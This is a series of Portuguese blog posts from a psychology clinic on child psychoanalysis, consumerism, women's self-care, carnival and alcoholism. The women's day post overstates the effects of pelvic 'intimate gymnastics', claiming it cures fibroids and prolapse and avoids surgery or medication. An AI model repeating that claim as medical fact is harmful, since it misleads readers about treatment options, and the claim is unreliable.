a nível individual ou coletivo.

Categories:

Dia Mundial da Infância: Algumas Considerações sobre a Psicanálise com Crianças

“Uma alta porcentagem de consultas é motivada, ao que parece, por “distúrbios escolares”. Se existem dificuldades escolares de origem puramente pedagógica, também não deixa de ser verdade que esse sintoma encobre, quase sempre, outra coisa. É não entendendo ao pé da letra o pedido dos pais que o psicanalista permitirá que a porta se entreabra para o campo da neurose familiar, dissimulada, fixada no sintoma do qual a criança se torna o apoio.” (MANNONI, Maud – 1923).

Em teoria psicanalítica, é sabido que, são raros os escritos clínicos entendidos como registros de sessões infantis. Todavia, a documentação verbal e gráfica que Freud nos deixou de seus principais casos com crianças, o Pequeno Hans e o Homem dos Lobos, muito lhe serviram como fonte de pesquisa e desenvolvimento de algumas noções e pilares da psicanálise, como por exemplo, os mecanismos de defesa das estruturas psíquicas nas neuroses de angústia, fobias, conversões histéricas, bem como, ruminações e cerimoniais obsessivos. Tais clássicos, nos fornecem base de consistência para segmentar uma clínica de fundamentação teórica e pesquisa técnica.

No que confere ao tratatamento infantil, em especial, se faz necessário lembrar que, crianças não marcam consultas. Os pais marcam para falar de um filho, que muitas vezes está à margem e desconhece o movimento dos pais em contactarem um psicanalista. Nesse sentido, questões relativas à demanda e o desejo são postas na mesa, a partir do discurso parental que aparece em cena na primeira instância. Na escuta dos pais, nossa investigação volta-se para a tentativa de compreender se a criança apresenta uma demanda – um sintoma clínico, ou se ela é apenas a manifestação sintomática da sua família, ou presentifica sintomas de estrutura que surgem no processo de subjetivação – sintoma de infância.

Em entrevistas preliminares com os pais, quantas são necessárias? Não existe uma fórmula ou um padrão a ser seguido, o único imperativo a ser posto é: muito Acolhimento. Acolher esses pais que decidem lhe procurar para mostrar sua ferida narcísica mais dolorosa: ter um filho com problemas. A nós analistas infantis (dou ênfase à tal clínica com crianças e adolescentes, uma vez que ela só é possível, a partir da vinculação com os pais), não nos cabem julgamentos morais e de valores, o lugar de juízes, tampouco, nos posicionar, tomar partido, rivalizar com algum discurso. O Outro só dá o que tem e o que pode dar. É através desse olhar clínico de respeito e ética à subjetividade, ao Inconsciente e à história de vida de cada sujeito, que repetições de sintomas transgeracionais e familiares podem ser interrompidas.

Ao adentrar de modo efetivo na linguagem, a criança fala de si na terceira pessoa; afinal, ela é a terceira pessoa do trio pai, mãe e filho. Nos primeiros anos de vida, a criança ao dizer “eu”, ela significa de modo constitutivo “eu (minha mãe)”, ou “eu (meu pai)”, pois a noção da própria existência está, para cada um, concomitante associada a si mesmo situado em seu corpo, e relacionada com um Outro, que tem relação com outros. As primeiras entrevistas possibilitam ao analista estar em presença de um discurso – seja ele dos pais ou daquele do filho – que pode ser descrito “de alienado”, no sentido etimológico da palavra. De todo modo, pois, entende-se que ele não é o discurso do sujeito, legitimado, mas dos outros, ou da opinião. A experiência analítica por sua vez, visa permitir uma objetivação psicológica desse sujeito, que é a saída da criança de um discurso alienado, em muitos casos, apresentado por máscaras sociais. Seguramente, é comum aparecer na demanda dos pais, não somente uma demanda inconsciente que concerne ao seu próprio sintoma, mas também, ao sintoma da estruturação familiar.

As relações dinâmicas inconscientes pais-filhos, possuem valor estruturante sadio ou patogênico. Tal fenômeno induzido na escuta psicanalítca, denuncia certo limite da comunicação em transpor os limiares do dito pela palavra. Naquele ponto em que a linguagem termina, e a conduta motora continua a falar, quando se trata de “crianças perturbadas”, são elas que pelos seus sintomas, encarnam e presentificam as consequências de um conflito vivo, familiar ou conjugal, camuflado e aceito por seus pais. É a criança que suporta pelo não dito, o peso das tensões e interferências da triangulação pais-filhos, que recai sobre os últimos, as crianças, com efeito mais intenso, quanto mais se guarda ao seu redor, o silêncio e o segredo. Os sintomas de impotência que a criança pequena e o adolescente manifestam, são assim o porta-vozes de seus pais – uma ressonância às angústias ou aos processos reativos parentais. Quanto mais jovens são os seres humanos, maior a carga das inibições dinâmicas sofridas direta ou indiretamente por querelas dos adultos, uma vez que restringe o seu livre jogo de vitalidade emocional, e menos conseguem se defender criativamente delas.

É apreendido, que muitas vezes, a criança ocupa o lugar do sintoma no laço conjugal, ela que é convocada quando este encontra-se inconsistente, na tentativa de preencher uma falta, já que a relação de cada um dos parceiros frente ao Outro, não instituiu a complementariedade tão sonhada. E então, o que os pais desejam ou esperam de um filho? Em comum, que ele se torne um fetiche social, um aluno exemplar, com boas notas, rodeado de amigos e absurdamente feliz – sem faltas para mostrar no Social. Um número cada vez maior de crianças são trazidas à clínica, e a mesma questão me é imposta caso a caso: o que existe, pois de não comunicável em palavras que se imobiliza e fixa num sintoma? É para essa investigação que não cheguemos à nenhuma conclusão enquanto analistas, mas, que um problema seja lançado.

Mediante ao nó clínico que se configura um filho enquanto símbolo do “fruto do nosso amor”, é nele encarnado a promessa de responder ao ideal da perfeição e desejo dos pais de que ele viesse a completá-los. Ao psicanalista clínico, lhe é importante escutar para além do que é manifesto no discurso da queixa parental. Cabe sempre ao analista, escutar as lacunas do texto, e não o texto discursivo do enunciado (o dito) – escutar os tropeços nas palavras, os lapsos, isto é, as formações do inconsciente. Nesse sentido, o trabalho inicial a ser feito é com os pais, para assim possibilitar que eles reconheçam e suportem a alteridade do filho, que pela lógica dialética é, ao mesmo tempo, semelhante e absolutamente diferente deles.

Referências Bibliográficas:
DOLTO, Françoise. O caso Dominique. Editora WMF Martins Fontes, 1971, 2010;
DOR, Joel. Introdução à leitura de Lacan: O inconsciente estruturado como linguagem, 1985. Editora Artes Médicas Sul LTDA, Série Discurso Psicanalítico;
MANNONI, Maud. A primeira entrevista em psicanálise. Elsevier Editora Ltda, 1980, 2004;
VÉRAS, Maria. Artigo: A dialética da demanda e do desejo em Psicanálise com Crianças, 2019.

Categories:

O Consumismo como Forma de Adoecimento

No mundo contemporâneo consumir é a regra, dentro do sistema econômico, o consumo é parte de um processo mais amplo de produção de bens e serviços, assim como uma etapa na cadeia de organização do trabalho (meio de produção dos bens que serão consumidos). O consumo, dentro desta visão, é a aquisição daquilo que é necessário para a vida de cada um, e é visto como normal. Já o consumismo, por sua vez, seria o comportamento de comprar de forma descontrolada e exagerada (as vezes sem ter condições) produtos e serviços, e que muitas vezes são supérfluos. Estaríamos todos nos tornando consumistas? Afinal, quem vive somente com o que necessita? E quais os efeitos psicológicos de um comportamento consumista?

Na psicanálise chamamos o modo moderno de produção de bens e serviços de discurso capitalista. O discurso capitalista é responsável por estabelecer as regras das relações entre as pessoas e o mundo em que vivem, essa relação é sempre de compra e venda, tudo tem um preço. O ápice dessa ideologia veio com a célebre conclusão: “tempo é dinheiro”. O discurso capitalista assim contribui para a crescente construção de um mundo em que tudo precisa acontecer rápido (afinal perder tempo é perder dinheiro) e que a ansiedade se torna cada vez mais banal. Assim o capitalismo também transformou o consumo no meio através do qual o sujeito estabelece as bases de quem ele é, o que levou a jocosa inversão da fórmula de Descartes: “compro, logo sou”.

Consumir muito, a necessidade de não perder tempo e só saber se afirmar a partir do consumo, são apenas alguns dos efeitos do discurso capitalista que geram questões importantes e que tem impacto psicológico na vida das pessoas. É assim que o consumismo aparece associado a quadros de sofrimento psicológico e acaba por adquirir o status de vício. Assim como qualquer outro vício (fumar, beber, jogar e etc.) comprar se torna uma compulsão que não se pode controlar. Geralmente vinculado a quadros de ansiedade e depressão, ele funciona como uma forma de aliviar determinados sintomas, sempre numa tentativa de evitar algum tipo de sofrimento. Então a pessoa começa a comprar por estar estressada, por estar triste, por estar ansiosa, e com frequência o faz sem perceber. O consumismo se torna tão nocivo quanto qualquer forma de adoecimento mental, criando, ele mesmo, uma relação de sofrimento e dependência.

O mais perigoso do mundo contemporâneo é que o discurso capitalista normalizou os atos de consumo exagerado, ao ponto de estarmos quase todos vivendo como consumistas adoecidos. Somos a sociedade que, como descreveu Oscar Wild, “sabe o preço de tudo, mas não conhece o valor de nada”. Nesse sentido, a vida e os ensinamentos do filosofo grego Diógenes se tornam para nós imediatamente uma provocação. Integrante da escola cínica, pregava uma vida simples, vivida com humildade e ética. Era um crítico dos exageros e da vida valorizada apenas como meio de obtenção de objetos materiais. Conta-se que um dia esse homem extremamente desapegado foi visto no principal e maior mercado de Atenas, estava a olhar os objetos vendidos com muito interesse. Como as pessoas o conheciam, acharam aquilo estranho, até que alguém o perguntou: – Diógenes, o que você está fazendo aqui? Ao que o filósofo respondeu: – Estou olhando tudo que eu não preciso para viver.

Referências
SILVA, Paulo José Carvalho da; BEER, Paulo Antonio de Campos. Sobre o cinismo em um tempo de identificações irônicas. Trivium, Rio de Janeiro , v. 3, n. 1, p. 84-98, jun. 2011 . Disponível em http://pepsic.bvsalud.org/scielo.php?script=sci_arttext&pid=S2176-48912011000100009&lng=pt&nrm=iso. acessos em 12 fev. 2020.
TEIXEIRA, Vanessa Leite; COUTO, Luís Flávio Silva. A Cultura do Consumo: Uma Leitura Psicanalítica Lacaniana. Psicologia em Estudo, Maringá, v. 15, n. 3, p. 583-591, 2010.

Categories:

Linhas do tempo e autocuidado feminino: salve as mulheres de todos os dias!

Aproveitando a data comemorativa do Dia Internacional da Mulher, compreendemos que as datas comemorativas são como rituais necessários para reflexões mais amplas. É fato que algumas mulheres adoram ser homenageadas no dia 8 de março e outras não gostam dos mimos que recebem, a exemplo de flores, produtos de beleza. Algumas relatam enorme insatisfação com as comemorações neste dia, ao passo que outras amam receber flores ou outros presentes. Esta rica diversidade nos mostra não apenas uma, mas algumas possibilidades de se ser mulher nos dias atuais. Há aquelas que realizaram seus sonhos com o casamento, com a constituição da família. Outras, por sua vez, nunca idealizaram se casar ou ter filhos e encontraram a sua realização no campo profissional. Algumas tiveram seus sonhos frustrados com a separação conjugal. Nem todas optaram pelos recasamentos. Há aquelas ainda com orientação sexual diversa do padrão heteronormativo. Estas e outras configurações caracterizam a mulher dos dias atuais, melhor dizendo, as mil possibilidades de se ser mulher.

Podemos falar sobre a constituição da condição feminina desde a infância, quando estávamos recebendo “educação de menina”, para “meninas”. “Menina feche as pernas!” “Sente direito”. “Menina, isto é brincadeira de menino. Venha aprender a cozinhar”. Sabemos que apesar deste estilo educacional não ser predominante hoje em dia, ainda preserva muitos de seus valores.

E quem não se lembra da primeira menstruação? E aquelas que não receberam orientação familiar ou de algum profissional, viviam verdadeiros pânicos até imaginando ter uma doença grave. E assim segue a lista das inquietações femininas diante das experiências nas mais diversas faixas etárias: a coleguinha preferida na escola, a professora predileta ou o professor predileto, o brinquedo tão sonhado no Natal, o primeiro namorado, o primeiro beijo, a primeira relação sexual, o primeiro emprego, a entrada na universidade, as rugas que começavam a se esboçar no rosto, os primeiros fios de cabelo branco, os hormônios à flor da pele, as mil e uma obrigações e poucas pessoas para compartilhar. Poderíamos, aqui, tecer uma linha do tempo da infância à velhice, mas precisaríamos contextualizar para os dias de hoje. Com a quebra de muitos paradigmas, o jeito de se educar as meninas hoje é bem diferente do que era décadas atrás. Está certo que muitas famílias ainda conservam o modelo tradicional. Muitas mudanças também estão nos relacionamentos amorosos. É muito diferente a ideia do casamento, já que nem todas hoje fazem a opção pelo “casamento tradicional”. Muitas vão morar com seus namorados antes de oficializarem a união. Muitos relacionamentos são temporários. Há até quem mantenha relacionamentos amorosos à distância, quando ambos estão geograficamente distantes. E conforme as mulheres vão envelhecendo, novas questões vão surgindo, muitas delas relacionadas com problemas de saúde, com dificuldades nos relacionamentos familiares, nos relacionamentos amorosos, nas relações profissionais e problemas financeiros.

É evidente que não é um caminho fácil se tornar mulher da infância à velhice. Nem tudo o que idealizamos conseguimos realizar. Algumas frustrações nos trazem dificuldades afetivas, sociais, até profissionais e nem todas as mulheres visualizam boas perspectivas para a resolução de seus problemas. O autocuidado é algo que tem sido muito negligenciado pela maioria das mulheres. Em muitas situações, determinados serviços só são procurados em casos de agravamento e nem sempre são levados com êxito. Falar da condição feminina nesta matéria nos levou, ainda, a abordar sobre a ausência de autocuidado pela maioria das mulheres com a sua saúde psicológica e saúde sexual. Em países como a Tailândia, hábitos cotidianos como ginástica íntima são passados de mães para filhas. Aqui, no Brasil é um tabu, pouca gente ouviu falar sobre este tratamento que é tão eficaz na cura de doenças como queda de bexiga, incontinência urinária, as conturbadas cólicas menstruais, os miomas, evitando algumas cirurgias ou o uso de medicamentos. A ginástica íntima associada ao apoio fisioterapêutico, com a simulação de um parto, prepara gestantes, com o uso de aparelhos; o que contribui com um parto menos sofrido. Melhorando muito o tônus muscular vaginal, aumenta também o apetite sexual. Quantas mulheres que se imaginavam frígidas ou que sentiam dores nas relações sexuais curam estes problemas com este tratamento! Como exige uma rotina diária de cuidados e costuma interferir em aspectos emocionais, não o indicamos para aquelas que não estão em atendimento psicoterapêutico, considerando que a grande maioria acaba desistindo dos exercícios por falta de motivação, por dificuldades com os parceiros, por não saberem lidar com a nova libido gerada ou por outros problemas emocionais. Este é só um entre tantos outros exemplos que podem ser explorados num atendimento psicológico para valorização do autocuidado e a busca de novos sentidos na vida de uma mulher.

Dedicamos este texto a todas as mulheres que, da infância à velhice, buscam se posicionar numa sociedade com valores por demais contraditórios, levando algumas a distintos processos de sofrimento. Quem não gosta de ser acolhida, entendida, valorizada? A Clínica Holos aproveita o Dia Internacional das Mulheres para expressar o quanto você, menina ou mulher, cliente dos nossos serviços ou seguidora de nossas redes sociais, é importante para nós. Através da confiança que nos deposita, cuidamos de muitas de vocês, com muito zelo e respeito. Que esta data seja comemorada por vocês do jeito que lhes convierem, seja recebendo flores, cartões, seja realizando manifestações políticas, seja recebendo um abraço, compartilhando experiências. De nós, recebam esta mensagem sobre a importância de cuidar de si. Salve as mulheres de todos os dias!

Categories:

“Carnavalizou e… O ano começou”

Há quem diga que o ano começa apenas depois do carnaval. Mesmo quem não participa da festa nos blocos ou desfiles espera esta data para poder ficar “offline”. Desde que as sociedades se configuraram houve a necessidade de uma festa, de alguns dias no ano, onde os sujeitos pudessem possam se despir de seus problemas e dilemas para vivenciarem os prazeres de gozar do corpo e das insignificâncias da vida.
Mas, há possibilidade de se despir de tudo o que lhe representa, vestir uma máscara ou fantasia que lhe caiba tão bem que lhe permita ser outra pessoa? E, o que fazer depois que o carnaval passar?

Carnavalizou
Se foram as tristezas e pendências
O ano passado acabou
E eu, para onde vou?

Vou colocar minha fantasia
Muito brilho, cores, só alegria!
Que se dane a tristeza, as dívidas, dessabores e agonia!
Quero viver toda a intensidade que me permite essa vida.

Muita música, bebida, comida
Amores…. muito mais do que me cabia
Todo mundo ria
Mas, o fim da tarde de terça acenava com ironia.

A noite clareava e, meu Deus!
A festa da carne acabou
A quarta-feira de cinzas chegou.

No seu espectro de preto e branco
Todo o brilho se lavou
Tentei tirar minha fantasia
Mas, percebi que nenhuma ali havia
Eu estava nu!
Evitando os reflexos e reflexões das máscaras que visto todos os dias
Dias Santos…
Para conviver com meus prantos.
Onde é que eles estavam?
Ou melhor, para onde eu e eles iremos?
Cadê a euforia, os amores e sabores, as rimas?
Que desencanto!
Aqui dentro ainda mora a magia daqueles dias
O que eu devo fazer é regar essa semente dia a após dia.
Tudo o que faz bem não dura pouco
Tem o tempo da existência da sanidade, para não nos deixar loucos.
Na grande avenida da vida nos cabe o barulho ou som de quantos trios elétricos desejarmos.
Na carne que vivemos cabem as ressacas, fantasias, brilho e suor que implicarmos.
Os confetes e serpentinas nos cabem serem jogados ao ar ou ficarem caídos ao chão.
Um feliz ano novo,
De novo.

Categories:

O Alcoolismo como sofrimento psíquico

“A escravidão do corpo é obra do destino e a escravidão da alma é obra do vício. O verdadeiro escravo é aquele tiranizado pelos seus próprios vícios.” (Epíteto)

O alcoolismo é uma doença grave e infelizmente comum em nossa sociedade. Se caracteriza pela falta de controle e/ou excesso na ingestão de bebidas alcoólicas e possui repercussões extremamente negativas na vida de um sujeito, podendo chegar a contribuir para perda de desempenho no trabalho, deterioração dos vínculos sociais, além de apresentar forte comorbidade com transtornos mentais como depressão e ansiedade. O alcoolismo se manifesta de diferentes formas de acordo com a personalidade e a estrutura psicológica de cada pessoa. Por isso, ao contrário do que se poderia imaginar, ser alcoólatra não significa necessariamente beber em quantidade, existem pessoas que só precisam de um ou dois copos de cerveja para desencadear um estado de embriaguez vinculado ao alcoolismo, o que se chama de intoxicação patológica ou idiossincrática. Já outras sentem a necessidade de beber todos os dias, inclusive em casa e sozinho, e não conseguem passar um dia sem ingerir álcool, caracterizado como síndrome de dependência.

Como diagnosticar o alcoolismo?

Como toda classificação patológica, deve-se levar em consideração os sintomas relevantes, mas também a duração e a intensidade destes. Algumas perguntas norteiam a anamnese: com que frequência a pessoa bebe? Que quantidade de álcool ingere normalmente? A bebida usualmente leva o sujeito ao estado de embriaguez extrema? Faz o sujeito adotar comportamentos agressivos? A bebida leva o sujeito a um estado de tristeza? Prejudica suas relações com a família e amigos? Atrapalha seu rendimento no trabalho? São algumas das perguntas que norteiam uma avaliação diagnóstica sobre o alcoolismo.

Tratamento do alcoolismo

O tratamento do alcoolismo pode ser realizado por diversos meios. Existe o tratamento com medicações psiquiátricas, com terapias, terapias em grupo, redes públicas de tratamento (CAPS) e grupos de apoio (Alcóolicos Anônimos). No caso da terapia, é possível para além da dependência química e do efeito biológico do álcool no organismo, que o sujeito entenda as causas que o levam a beber de maneira nociva. Abrindo o caminho para uma nova relação consigo e com a bebida, na qual possa superar os danos e limitações provocas pelo vício.

Para psicanálise, muitas drogas (lícitas ou ilícitas) entram da dinâmica psíquica do indivíduo como forma de lidar com a falta, a frustração, ou dificuldades para lidar com o real da existência. Substâncias psicoativas tendem a propiciar um momento de prazer ou um instante de apagamento das dores do sujeito, uma fuga (ou perda) da realidade. “Perda da Realidade na Neurose e na Psicose” é um texto de Freud de 1924 em que ele trata de como processos de neurose possuem características em comum com processos de psicose. Parece uma tendência do psiquismo humano se defender ao se afastar da realidade em busca de um mecanismo de prazer que torne o insuportável mais palatável.

O vício ocorre quando após a fuga a realidade retorna, o sujeito se vê obrigado a beber novamente para uma nova evitação e assim sucessivamente. Ao mesmo tempo, doses de álcool que antes eram suficientes começam a não bastar (o organismo começa a adquiri tolerância a bebida) e é preciso beber em maiores quantidades. O caminho leva a autodestruição, mas por que um organismo tenderia a se fazer mal? Em Além do Princípio de Prazer (1920) Freud indica que existe uma tendência pulsional no corpo que levaria a sua própria destruição, o inconsciente não é movido apenas pela obtenção do prazer, mas também para obtenção do desprazer e da destruição.

Segundo os psicanalistas Antônio Alves Xavier e Emir Tomazelli, em seu livro “O Idealcoolísmo”, o tratamento do alcoolismo é difícil pois o sujeito tende a ter uma relação de completude com a bebida, dificultando o apelo a qualquer ajuda ou auxílio, dessa forma a possibilidade de transferência com um psicanalista fica dificultada. Ainda assim, é possível haver sucesso no tratamento quando é possível humanizar o sujeito que faz a sua análise, auxiliando-o a entrar em contato com as insuportáveis faltas e frustrações de sua vida que contribuem para seu adoecimento. A difícil posição em que se encontra o alcóolatra pode mudar, é o que diz a psicanalista Virginia Galvão: “Através do processo de análise esta posição tende a se modificar, a confrontação com a falta pode passar a ser uma possibilidade, a partir das suas construções”. O fim do alcoolismo é a passagem para uma posição ética de responsabilidade pelo próprio sofrimento, posição que permite ao sujeito abandonar a posição de escravo em relação ao álcool, assumindo as diretrizes de sua vida.

Referências
XAVIER, A. TOMAZELLI, E. O Idealcoolísmo, Casa do Psicólogo, 2012.
FREUD, S. O Mal-estar na Civilização, Novas Conferências Introdutórias E Outros Textos {1930-1936}. Companhia das letras Vol.: 18, 2010.
FREUD, S. História de uma Neurose Infantil (“O Homem dos Lobos”), Além do Princípio do Prazer E Outros Textos {1917-1920}, Companhia das Letras Vol.: 14, 2010.
GALVAO, Virgínia Lúcia Britto S. Gozo e alcoolismo. Cogito, Salvador, v. 3, p. 91-93, 2001. Disponível em http://pepsic.bvsalud.org/scielo.php?script=sci_arttext&pid=S1519-94792001000100011&lng=pt&nrm=iso. acessos em 15 jan. 2020.

Categories: